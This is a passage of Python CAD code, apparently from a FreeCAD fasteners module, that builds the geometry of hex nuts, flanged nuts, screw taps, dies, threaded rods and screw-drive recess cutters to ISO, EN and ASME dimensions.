pch3 = (da / 2.0 - 2 * H, 0.0, - 2.1 * P) #
# pch2 = (da/2.0, 0.0, l)
# pch3 = (da/2.0 - 2*H, 0.0, l - cham_i)
edgech0 = Part.makeLine(pch0, pch1)
edgech1 = Part.makeLine(pch1, pch2)
edgech2 = Part.makeLine(pch2, pch3)
edgech3 = Part.makeLine(pch3, pch0)
Wch_wire = Part.Wire([edgech0, edgech1, edgech2, edgech3])
bottom_Face = Part.Face(Wch_wire)
# bottom_Solid = bottom_Face.revolve(Base.Vector(0.0,0.0,-(rotations-1)*P),Base.Vector(0.0,0.0,1.0),360)
bottom_Solid = bottom_Face.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cham_Solid, 'cham_Solid')
# Part.show(Wch_wire)
bottomChamferFace = bottom_Solid.Faces[0]
# points for chamfer: cut-Method
pch0t = (da / 2.0 - 2 * H, 0.0, l - cham_i) # top chamfer
pch1t = (da / 2.0, 0.0, l) #
pch2t = (da / 2.0, 0.0, l + 4 * P)
pch3t = (da / 2.0 - 2 * H, 0.0, l + 4 * P) #
edgech0t = Part.makeLine(pch0t, pch1t)
edgech1t = Part.makeLine(pch1t, pch2t)
edgech2t = Part.makeLine(pch2t, pch3t)
edgech3t = Part.makeLine(pch3t, pch0t)
Wcht_wire = Part.Wire([edgech0t, edgech1t, edgech2t, edgech3t])
top_Face = Part.Face(Wcht_wire)
top_Solid = top_Face.revolve(Base.Vector(0.0, 0.0, (rotations - 1) * P), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(top_Solid, 'top_Solid')
# Part.show(Wch_wire)
topChamferFace = top_Solid.Faces[0]
threeThreadFaces = TheFaces.copy()
for k in range(1):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for threadFace in TheShell.Faces:
threeThreadFaces.append(threadFace)
chamferShell = Part.Shell(threeThreadFaces)
# Part.show(chamferShell, 'chamferShell')
# Part.show(bottomChamferFace, 'bottomChamferFace')
bottomPart = chamferShell.cut(bottom_Solid)
# Part.show(bottomPart, 'bottomPart')
bottomFuse, bottomMap = bottomChamferFace.generalFuse([chamferShell], fuzzyValue)
# print ('bottomMap: ', bottomMap)
# chamFuse, chamMap = chamferShell.generalFuse([bottomChamferFace])
# print ('chamMap: ', chamMap)
# Part.show(bottomFuse, 'bottomFuse')
# Part.show(bottomMap[0][0], 'bMap0')
# Part.show(bottomMap[0][1], 'bMap1')
innerThreadFaces = [bottomMap[0][1]]
for face in bottomPart.Faces:
innerThreadFaces.append(face)
# bottomShell = Part.Shell(innerThreadFaces)
# Part.show(bottomShell)
bottomFaces = []
# TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for k in range(1, rotations - 2):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for threadFace in TheShell.Faces:
innerThreadFaces.append(threadFace)
# testShell = Part.Shell(innerThreadFaces)
# Part.show(testShell, 'testShell')
chamferShell.translate(FreeCAD.Vector(0.0, 0.0, (rotations - 1) * P))
# Part.show(chamferShell, 'chamferShell')
# Part.show(topChamferFace, 'topChamferFace')
topPart = chamferShell.cut(top_Solid)
# Part.show(topPart, 'topPart')
for face in topPart.Faces:
innerThreadFaces.append(face)
topFuse, topMap = topChamferFace.generalFuse([chamferShell], fuzzyValue)
# print ('topMap: ', topMap)
# Part.show(topMap[0][0], 'tMap0')
# Part.show(topMap[0][1], 'tMap1')
# Part.show(topFuse, 'topFuse')
innerThreadFaces.append(topMap[0][1])
# topFaces = []
# for face in topPart.Faces:
# topFaces.append(face)
# topFaces.append(topMap[0][1])
# testTopShell = Part.Shell(topFaces)
# Part.show(testTopShell, 'testTopShell')
threadShell = Part.Shell(innerThreadFaces)
# Part.show(threadShell, 'threadShell')
return threadShell
    # make the ISO 4032 Hex-nut
    # make the ISO 4033 Hex-nut
    # also used for ISO 4035 and ASME B18.2.2.1A / B18.2.2.4 Hex-nuts
def makeIso4032(self, SType='ISO4032', ThreadType='M6'):
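        # Hex nuts: revolve the nut cross-section (with top and bottom chamfers),
        # cut the hexagon flats with makeHextool, and add the thread either by
        # cutting with an internal-thread cutter (very small or very large
        # diameters) or by inserting the thread shell from makeInnerThread_2.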
dia = self.getDia(ThreadType, True)
# P, tunIn, tunEx
# Ptun, self.tuning, tunEx = tuningTable[ThreadType]
if SType == 'ISO4032':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4032def"][ThreadType]
if SType == 'ISO4033':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4033def"][ThreadType]
if SType == 'ISO4035':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4035def"][ThreadType]
if SType == 'ASMEB18.2.2.1A':
P, da, e, m, s = FsData["asmeb18.2.2.1adef"][ThreadType]
if SType == 'ASMEB18.2.2.4A':
P, da, e, m_a, m_b, s = FsData["asmeb18.2.2.4def"][ThreadType]
m = m_a
if SType == 'ASMEB18.2.2.4B':
P, da, e, m_a, m_b, s = FsData["asmeb18.2.2.4def"][ThreadType]
m = m_b
residue, turns = math.modf(m / P)
# halfturns = 2*int(turns)
if residue > 0.0:
turns += 1.0
if SType == 'ISO4033' and ThreadType == '(M14)':
turns -= 1.0
if SType == 'ISO4035' and ThreadType == 'M56':
turns -= 1.0
sqrt2_ = 1.0 / math.sqrt(2.0)
cham = (e - s) * math.sin(math.radians(15)) # needed for chamfer at nut top
        H = P * math.cos(math.radians(30)) # Thread depth H
cham_i_delta = da / 2.0 - (dia / 2.0 - H * 5.0 / 8.0)
cham_i = cham_i_delta * math.tan(math.radians(15.0))
if self.rThread:
Pnt0 = Base.Vector(da / 2.0 - 2.0 * cham_i_delta, 0.0, m - 2.0 * cham_i)
Pnt7 = Base.Vector(da / 2.0 - 2.0 * cham_i_delta, 0.0, 0.0 + 2.0 * cham_i)
else:
Pnt0 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt7 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
Pnt1 = Base.Vector(da / 2.0, 0.0, m)
Pnt2 = Base.Vector(s / 2.0, 0.0, m)
Pnt3 = Base.Vector(s / math.sqrt(3.0), 0.0, m - cham)
Pnt4 = Base.Vector(s / math.sqrt(3.0), 0.0, cham)
Pnt5 = Base.Vector(s / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(da / 2.0, 0.0, 0.0)
edge0 = Part.makeLine(Pnt0, Pnt1)
edge1 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.makeLine(Pnt7, Pnt0)
# create cutting tool for hexagon head
# Parameters s, k, outer circle diameter = e/2.0+10.0
extrude = self.makeHextool(s, m, s * 2.0)
aWire = Part.Wire([edge0, edge1, edge2, edge3, edge4, edge5, edge6, edge7])
# Part.show(aWire)
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# Part.show(head)
# Part.show(extrude)
nut = head.cut(extrude)
# Part.show(nut, 'withoutTread')
if self.rThread:
# if (dia < 1.6)or (dia > 52.0):
if (dia < 1.6) or (dia > 64.0):
# if (dia < 3.0):
threadCutter = self.makeInnerThread_2(dia, P, int(turns + 1), None, m)
threadCutter.translate(Base.Vector(0.0, 0.0, turns * P + 0.5 * P))
# Part.show(threadCutter, 'threadCutter')
nut = nut.cut(threadCutter)
# chamFace = nut.Faces[0].cut(threadCutter)
# Part.show(chamFace, 'chamFace0_')
else:
nutFaces = [nut.Faces[2]]
for i in range(4, 25):
nutFaces.append(nut.Faces[i])
# Part.show(Part.Shell(nutFaces), 'OuterNutshell')
threadShell = self.makeInnerThread_2(dia, P, int(turns), da, m)
# threadShell.translate(Base.Vector(0.0, 0.0,turns*P))
# Part.show(threadShell, 'threadShell')
nutFaces.extend(threadShell.Faces)
nutShell = Part.Shell(nutFaces)
nut = Part.Solid(nutShell)
# Part.show(nutShell)
return nut
# EN 1661 Hexagon nuts with flange
    # note: the chamfer at the top of the hexagon is wrong (more than 30°)
def makeEN1661(self, ThreadType='M8'):
dia = self.getDia(ThreadType, True)
P, da, c, dc, dw, e, m, mw, r1, s = FsData["en1661def"][ThreadType]
residue, turns = math.modf(m / P)
# halfturns = 2*int(turns)
if residue > 0.0:
turns += 1.0
# FreeCAD.Console.PrintMessage("the nut with isoEN1661: " + str(c) + "\n")
cham = s * (2.0 / math.sqrt(3.0) - 1.0) * math.sin(math.radians(25)) # needed for chamfer at head top
sqrt2_ = 1.0 / math.sqrt(2.0)
# Flange is made with a radius of c
beta = math.radians(25.0)
tan_beta = math.tan(beta)
# Calculation of Arc points of flange edge using dc and c
arc1_x = dc / 2.0 - c / 2.0 + (c / 2.0) * math.sin(beta)
arc1_z = c / 2.0 + (c / 2.0) * math.cos(beta)
hF = arc1_z + (arc1_x - s / 2.0) * tan_beta # height of flange at center
# kmean = arc1_z + (arc1_x - s/math.sqrt(3.0)) * tan_beta + mw * 1.1 + cham
# kmean = k * 0.95
# Hex-Head Points
# FreeCAD.Console.PrintMessage("the nut with kmean: " + str(m) + "\n")
PntH0 = Base.Vector(da / 2.0, 0.0, m)
PntH1 = Base.Vector(s / 2.0, 0.0, m)
edgeH1 = Part.makeLine(PntH0, PntH1)
hWire = Part.Wire([edgeH1])
topShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
# Part.show(topShell)
# create a cutter ring to generate the chamfer at the top of the hex
chamHori = s / math.sqrt(3.0) - s / 2.0
PntC1 = Base.Vector(s / 2.0 - chamHori, 0.0, m + m)
PntC2 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, m + m)
PntC3 = Base.Vector(s / 2.0 - chamHori, 0.0, m + cham)
PntC4 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, m - cham - cham) # s/math.sqrt(3.0)
edgeC1 = Part.makeLine(PntC3, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC4)
edgeC4 = Part.makeLine(PntC4, PntC3)
cWire = Part.Wire([edgeC4, edgeC1, edgeC2, edgeC3])
cFace = Part.Face(cWire)
chamCut = cFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cWire)
# Part.show(chamCut)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s / math.sqrt(3.0), 0.0, m)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, c - m))
# Part.show(solidHex)
hexCham = solidHex.cut(chamCut)
# Part.show(hexCham)
topFaces = topShell.Faces
topFaces.append(hexCham.Faces[1])
topFaces.append(hexCham.Faces[2])
topFaces.append(hexCham.Faces[8])
topFaces.append(hexCham.Faces[13])
topFaces.append(hexCham.Faces[14])
topFaces.append(hexCham.Faces[12])
topFaces.append(hexCham.Faces[6])
hexFaces = [hexCham.Faces[5], hexCham.Faces[11], hexCham.Faces[10]]
hexFaces.extend([hexCham.Faces[9], hexCham.Faces[3], hexCham.Faces[0]])
hexShell = Part.Shell(hexFaces)
H = P * math.cos(math.radians(30)) # Thread depth H
cham_i_delta = da / 2.0 - (dia / 2.0 - H * 5.0 / 8.0)
cham_i = cham_i_delta * math.tan(math.radians(15.0))
# Center of flange:
Pnt0 = Base.Vector(0.0, 0.0, hF)
Pnt1 = Base.Vector(s / 2.0, 0.0, hF)
# arc edge of flange:
Pnt2 = Base.Vector(arc1_x, 0.0, arc1_z)
Pnt3 = Base.Vector(dc / 2.0, 0.0, c / 2.0)
Pnt4 = Base.Vector((dc - c) / 2.0, 0.0, 0.0)
Pnt5 = Base.Vector(da / 2.0, 0.0, 0.0) # start of fillet between flat and thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
# make a cutter for the hexShell
PntHC1 = Base.Vector(0.0, 0.0, arc1_z)
PntHC2 = Base.Vector(0.0, 0.0, 0.0)
edgeHC1 = Part.makeLine(Pnt2, PntHC1)
edgeHC2 = Part.makeLine(PntHC1, PntHC2)
edgeHC3 = Part.makeLine(PntHC2, Pnt0)
HCWire = Part.Wire([edge2, edgeHC1, edgeHC2, edgeHC3, edge1])
HCFace = Part.Face(HCWire)
hex2Cut = HCFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
hexShell = hexShell.cut(hex2Cut)
# Part.show(hexShell)
topFaces.extend(hexShell.Faces)
if self.rThread and (dia > 4.0):
aWire = Part.Wire([edge2, edge3, edge4])
boltIndex = 3
else:
if self.rThread:
Pnt7 = Base.Vector(dia / 2.1 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt6 = Base.Vector(dia / 2.1 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
else:
Pnt7 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt6 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.makeLine(Pnt7, PntH0)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edge6, edge7])
boltIndex = 6
# aFace =Part.Face(aWire)
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(headShell)
chamFace = headShell.Faces[0].cut(solidHex)
# Part.show(chamFace)
topFaces.append(chamFace.Faces[0])
for i in range(1, boltIndex):
topFaces.append(headShell.Faces[i])
if self.rThread:
if dia < 5.0:
nutShell = Part.Shell(topFaces)
nut = Part.Solid(nutShell)
# Part.show(nut, 'unthreadedNut')
threadCutter = self.makeInnerThread_2(dia, P, int(turns + 1), None, m)
threadCutter.translate(Base.Vector(0.0, 0.0, turns * P + 0.5 * P))
# Part.show(threadCutter, 'threadCutter')
nut = nut.cut(threadCutter)
else:
threadShell = self.makeInnerThread_2(dia, P, int(turns), da, m)
# threadShell.translate(Base.Vector(0.0, 0.0,turns*P))
# Part.show(threadShell)
for tFace in threadShell.Faces:
topFaces.append(tFace)
headShell = Part.Shell(topFaces)
nut = Part.Solid(headShell)
else:
nutShell = Part.Shell(topFaces)
nut = Part.Solid(nutShell)
return nut
    # make a screw tap: a body carrying the internal thread profile,
    # intended to be used as a cutting tool for internal threads
def makeScrewTap(self, SType='ScrewTap', ThreadType='M6', l=25.0, customPitch=None, customDia=None):
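        # Screw tap: a body carrying the internal (female) thread profile, meant
        # to be used as a cutting tool on another part; without rThread it is
        # just a plain cylinder at the thread core diameter.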
if ThreadType != 'Custom':
dia = self.getDia(ThreadType, True)
if SType == "ScrewTap":
P, tunIn, tunEx = FsData["tuningTable"][ThreadType]
elif SType == 'ScrewTapInch':
P = FsData["asmeb18.3.1adef"][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smNutThrScaleA * customDia + self.smNutThrScaleB
else:
dia = customDia
residue, turns = math.modf(l / P)
# FreeCAD.Console.PrintMessage("turns:" + str(turns) + "res: " + str(residue) + "\n")
if residue > 0.00001:
turns += 1.0
if self.rThread:
screwTap = self.makeInnerThread_2(dia, P, int(turns), None, 0.0)
# screwTap.translate(Base.Vector(0.0, 0.0, (1-residue)*P))
else:
H = P * math.cos(math.radians(30)) # Thread depth H
r = dia / 2.0
# points for inner thread profile
adjusted_l = turns * P
Pnt0 = Base.Vector(0.0, 0.0, 0)
Pnt1 = Base.Vector(r - H * 5.0 / 8.0, 0.0, 0)
Pnt2 = Base.Vector(r - H * 5.0 / 8.0, 0.0, -adjusted_l)
Pnt3 = Base.Vector(0.0, 0.0, -adjusted_l)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.makeLine(Pnt2, Pnt3)
aWire = Part.Wire([edge1, edge2, edge3])
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
screwTap = Part.Solid(headShell)
screwTap.translate(Base.Vector(0.0, 0.0, -12.7))
return screwTap
# make object to cut external threads on a shaft
def makeScrewDie(self, SType="ScrewDie", ThreadType='M6', l=25.0, customPitch=None, customDia=None):
if ThreadType != "Custom":
dia = self.getDia(ThreadType, False)
if SType == "ScrewDie":
P, tunIn, tunEx = FsData["tuningTable"][ThreadType]
elif SType == "ScrewDieInch":
P = FsData["asmeb18.3.1adef"][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smScrewThrScaleA * customDia + self.smScrewThrScaleB
else:
dia = customDia
if self.rThread:
cutDia = dia * 0.75
else:
cutDia = dia
refpoint = Base.Vector(0, 0, -1 * l)
screwDie = Part.makeCylinder(dia * 1.1 / 2, l, refpoint)
screwDie = screwDie.cut(Part.makeCylinder(cutDia / 2, l, refpoint))
if self.rThread:
residue, turns = math.modf(l / P)
turns += 2.0
halfturns = 2 * turns
shell_thread = self.makeShellthread(dia, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(dia / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
screwDie = screwDie.cut(thread_solid)
return screwDie
# make a length of standard threaded rod
def makeThreadedRod(self, SType="ThreadedRod", ThreadType='M6', l=25.0, customPitch=None, customDia=None):
if ThreadType != 'Custom':
dia = self.getDia(ThreadType, False)
if SType == 'ThreadedRod':
P, tunIn, tunEx = FsData['tuningTable'][ThreadType]
elif SType == 'ThreadedRodInch':
P = FsData['asmeb18.3.1adef'][ThreadType][0]
else: # custom pitch and diameter
P = customPitch
if self.sm3DPrintMode:
dia = self.smScrewThrScaleA * customDia + self.smScrewThrScaleB
else:
dia = customDia
dia = dia * 1.01
cham = P
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(dia / 2 - cham, 0, 0)
p2 = Base.Vector(dia / 2, 0, 0 - cham)
p3 = Base.Vector(dia / 2, 0, -1 * l + cham)
p4 = Base.Vector(dia / 2 - cham, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e1, e2, e3, e4, e5])
p_shell = p_profile.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
screw = Part.Solid(p_shell)
if self.rThread:
dia = dia / 1.01
residue, turns = math.modf(l / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 7
else:
halfturns = halfturns + 6
# make the threaded section
shell_thread = self.makeShellthread(dia, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(dia / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
thread_solid.translate(Base.Vector(0, 0, 2 * P))
screw = screw.common(thread_solid)
return screw
def cutChamfer(self, dia_cC, P_cC, l_cC):
cham_t = P_cC * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntC0 = Base.Vector(0.0, 0.0, -l_cC)
PntC1 = Base.Vector(dia_cC / 2.0 - cham_t, 0.0, -l_cC)
PntC2 = Base.Vector(dia_cC / 2.0 + cham_t, 0.0, -l_cC + cham_t + cham_t)
PntC3 = Base.Vector(dia_cC / 2.0 + cham_t, 0.0, -l_cC - P_cC - cham_t)
PntC4 = Base.Vector(0.0, 0.0, -l_cC - P_cC - cham_t)
edgeC1 = Part.makeLine(PntC0, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC3)
edgeC4 = Part.makeLine(PntC3, PntC4)
edgeC5 = Part.makeLine(PntC4, PntC0)
CWire = Part.Wire([edgeC1, edgeC2, edgeC3, edgeC4, edgeC5])
# Part.show(CWire)
CFace = Part.Face(CWire)
cyl = CFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
return cyl
# cross recess type H
def makeCross_H3(self, CrossType='2', m=6.9, h=0.0):
# m = diameter of cross at top of screw at reference level for penetration depth
b, e_mean, g, f_mean, r, t1, alpha, beta = FsData["iso4757def"][CrossType]
rad265 = math.radians(26.5)
rad28 = math.radians(28.0)
tg = (m - g) / 2.0 / math.tan(rad265) # depth at radius of g
t_tot = tg + g / 2.0 * math.tan(rad28) # total depth
# print 'tg: ', tg,' t_tot: ', t_tot
hm = m / 4.0
hmc = m / 2.0
rmax = m / 2.0 + hm * math.tan(rad265)
Pnt0 = Base.Vector(0.0, 0.0, hm)
Pnt1 = Base.Vector(rmax, 0.0, hm)
Pnt3 = Base.Vector(0.0, 0.0, 0.0)
Pnt4 = Base.Vector(g / 2.0, 0.0, -tg)
Pnt5 = Base.Vector(0.0, 0.0, -t_tot)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge3 = Part.makeLine(Pnt1, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
# FreeCAD.Console.PrintMessage("Edges made Pnt2: " + str(Pnt2) + "\n")
aWire = Part.Wire([edge1, edge3, edge4])
crossShell = aWire.revolve(Pnt3, Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("Peak-wire revolved: " + str(e_mean) + "\n")
cross = Part.Solid(crossShell)
# Part.show(cross)
        # we need to cut 4 corners out of the above shape.
# Definition of corner
# The angles 92 degrees and alpha are defined on a plane which has
# an angle of beta against our coordinate system.
# The projected angles are needed for easier calculation!
rad_alpha = math.radians(alpha / 2.0)
rad92 = math.radians(92.0 / 2.0)
rad_beta = math.radians(beta)
rad_alpha_p = math.atan(math.tan(rad_alpha) / math.cos(rad_beta))
rad92_p = math.atan(math.tan(rad92) / math.cos(rad_beta))
tb = tg + (g - b) / 2.0 * math.tan(rad28) # depth at dimension b
rbtop = b / 2.0 + (hmc + tb) * math.tan(rad_beta) # radius of b-corner at hm
rbtot = b / 2.0 - (t_tot - tb) * math.tan(rad_beta) # radius of b-corner at t_tot
dre = e_mean / 2.0 / math.tan(rad_alpha_p) # delta between corner b and corner e in x direction
# FreeCAD.Console.PrintMessage("delta calculated: " + str(dre) + "\n")
dx = m / 2.0 * math.cos(rad92_p)
dy = m / 2.0 * math.sin(rad92_p)
PntC0 = Base.Vector(rbtop, 0.0, hmc)
PntC1 = Base.Vector(rbtot, 0.0, -t_tot)
PntC2 = Base.Vector(rbtop + dre, +e_mean / 2.0, hmc)
PntC3 = Base.Vector(rbtot + dre, +e_mean / 2.0, -t_tot)
PntC4 = Base.Vector(rbtop + dre, -e_mean / 2.0, hmc)
PntC5 = Base.Vector(rbtot + dre, -e_mean / 2.0, -t_tot)
PntC6 = Base.Vector(rbtop + dre + dx, +e_mean / 2.0 + dy, hmc)
# PntC7 = Base.Vector(rbtot+dre+dx,+e_mean/2.0+dy,-t_tot)
PntC7 = Base.Vector(rbtot + dre + 2.0 * dx, +e_mean + 2.0 * dy, -t_tot)
PntC8 = Base.Vector(rbtop + dre + dx, -e_mean / 2.0 - dy, hmc)
# PntC9 = Base.Vector(rbtot+dre+dx,-e_mean/2.0-dy,-t_tot)
PntC9 = Base.Vector(rbtot + dre + 2.0 * dx, -e_mean - 2.0 * dy, -t_tot)
# wire_hm = Part.makePolygon([PntC0,PntC2,PntC6,PntC8,PntC4,PntC0])
# face_hm =Part.Face(wire_hm)
# Part.show(face_hm)
wire_t_tot = Part.makePolygon([PntC1, PntC3, PntC7, PntC9, PntC5, PntC1])
# Part.show(wire_t_tot)
edgeC1 = Part.makeLine(PntC0, PntC1)
# FreeCAD.Console.PrintMessage("edgeC1 with PntC9" + str(PntC9) + "\n")
makeSolid = True
isFrenet = False
corner = Part.Wire(edgeC1).makePipeShell([wire_t_tot], makeSolid, isFrenet)
# Part.show(corner)
rot_axis = Base.Vector(0., 0., 1.0)
sin_res = math.sin(math.radians(90) / 2.0)
cos_res = math.cos(math.radians(90) / 2.0)
rot_axis.multiply(-sin_res) # Calculation of Quaternion-Elements
# FreeCAD.Console.PrintMessage("Quaternion-Elements" + str(cos_res) + "\n")
pl_rot = FreeCAD.Placement()
pl_rot.Rotation = (rot_axis.x, rot_axis.y, rot_axis.z, cos_res) # Rotation-Quaternion 90° z-Axis
crossShell = crossShell.cut(corner)
# Part.show(crossShell)
cutplace = corner.Placement
cornerFaces = []
cornerFaces.append(corner.Faces[0])
cornerFaces.append(corner.Faces[1])
cornerFaces.append(corner.Faces[3])
cornerFaces.append(corner.Faces[4])
cornerShell = Part.Shell(cornerFaces)
cornerShell = cornerShell.common(cross)
addPlace = cornerShell.Placement
crossFaces = cornerShell.Faces
for i in range(3):
cutplace.Rotation = pl_rot.Rotation.multiply(corner.Placement.Rotation)
corner.Placement = cutplace
crossShell = crossShell.cut(corner)
addPlace.Rotation = pl_rot.Rotation.multiply(cornerShell.Placement.Rotation)
cornerShell.Placement = addPlace
for coFace in cornerShell.Faces:
crossFaces.append(coFace)
# Part.show(crossShell)
for i in range(1, 6):
crossFaces.append(crossShell.Faces[i])
crossShell0 = Part.Shell(crossFaces)
crossFaces.append(crossShell.Faces[0])
crossShell = Part.Shell(crossFaces)
cross = Part.Solid(crossShell)
# FreeCAD.Console.PrintMessage("Placement: " + str(pl_rot) + "\n")
cross.Placement.Base = Base.Vector(0.0, 0.0, h)
crossShell0.Placement.Base = Base.Vector(0.0, 0.0, h)
# Part.show(crossShell0)
# Part.show(cross)
return cross, crossShell0
# Allen recess cutting tool
# Parameters used: s_mean, k, t_min, dk
def makeAllen2(self, s_a=3.0, t_a=1.5, h_a=2.0, t_2=0.0):
# h_a top height location of cutting tool
# s_a hex width
        # t_a depth of the allen recess
# t_2 depth of center-bore
if t_2 == 0.0:
depth = s_a / 3.0
e_cham = 2.0 * s_a / math.sqrt(3.0)
# FreeCAD.Console.PrintMessage("allen tool: " + str(s_a) + "\n")
# Points for an arc at the peak of the cone
rCone = e_cham / 4.0
hyp = (depth * math.sqrt(e_cham ** 2 / depth ** 2 + 1.0) * rCone) / e_cham
radAlpha = math.atan(e_cham / depth)
radBeta = math.pi / 2.0 - radAlpha
zrConeCenter = hyp - depth - t_a
xArc1 = math.sin(radBeta) * rCone
zArc1 = zrConeCenter - math.cos(radBeta) * rCone
xArc2 = math.sin(radBeta / 2.0) * rCone
zArc2 = zrConeCenter - math.cos(radBeta / 2.0) * rCone
zArc3 = zrConeCenter - rCone
# The round part of the cutting tool, we need for the allen hex recess
PntH1 = Base.Vector(0.0, 0.0, -t_a - depth - depth)
PntH2 = Base.Vector(e_cham, 0.0, -t_a - depth - depth)
PntH3 = Base.Vector(e_cham, 0.0, -t_a + depth)
PntH4 = Base.Vector(0.0, 0.0, -t_a - depth)
PntA1 = Base.Vector(xArc1, 0.0, zArc1)
PntA2 = Base.Vector(xArc2, 0.0, zArc2)
PntA3 = Base.Vector(0.0, 0.0, zArc3)
edgeA1 = Part.Arc(PntA1, PntA2, PntA3).toShape()
edgeH1 = Part.makeLine(PntH1, PntH2)
edgeH2 = Part.makeLine(PntH2, PntH3)
edgeH3 = Part.makeLine(PntH3, PntA1)
edgeH4 = Part.makeLine(PntA3, PntH1)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeA1, edgeH4])
hex_depth = -1.0 - t_a - depth * 1.1
else:
e_cham = 2.0 * s_a / math.sqrt(3.0)
d_cent = s_a / 3.0
depth_cent = d_cent * math.tan(math.pi / 6.0)
depth_cham = (e_cham - d_cent) * math.tan(math.pi / 6.0)
Pnts = [
Base.Vector(0.0, 0.0, -t_2 - depth_cent),
Base.Vector(0.0, 0.0, -t_2 - depth_cent - depth_cent),
Base.Vector(e_cham, 0.0, -t_2 - depth_cent - depth_cent),
Base.Vector(e_cham, 0.0, -t_a + depth_cham),
Base.Vector(d_cent, 0.0, -t_a),
Base.Vector(d_cent, 0.0, -t_2)
]
edges = []
for i in range(0, len(Pnts) - 1):
edges.append(Part.makeLine(Pnts[i], Pnts[i + 1]))
edges.append(Part.makeLine(Pnts[5], Pnts[0]))
hWire = Part.Wire(edges)
hex_depth = -1.0 - t_2 - depth_cent * 1.1
# Part.show(hWire)
